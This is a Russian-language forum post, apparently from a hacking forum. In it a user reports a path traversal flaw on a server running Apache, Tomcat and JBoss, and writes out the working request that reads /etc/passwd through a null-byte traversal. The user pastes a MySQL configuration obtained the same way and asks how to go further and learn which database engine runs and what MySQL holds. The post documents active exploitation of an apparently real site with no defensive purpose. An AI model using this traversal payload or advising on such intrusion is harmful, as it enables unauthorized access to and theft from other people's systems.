31.07.2010, 00:17
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами:
9709737
Репутация:
88
|
|
Есть сайт, крутится на apache2 tomcat
Есть уязвимость, заключается в скачивании любых файлов сервака, типа:
Сообщение от None
http://www.site.com/image?file=/../../../../../../../../../../../etc/passwd%00.html
Стоит на серваке Jboss, но какая база не ясно, файл etc/mysql/my.cnf прочитал, вот его содержимое:
Код:
[mysqld_safe] socket = /var/run/mysqld/mysqld.sock nice = 0 [mysqld] # # * Basic Settings # user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /tmp language = /usr/share/mysql/english skip-external-locking
!includedir /etc/mysql/conf.d/
логи не ведутся.
Вопрос, куда можно покопать и узнать какой может быть движок базы и как можно узнать есть ли что-то в mysql? |
|
|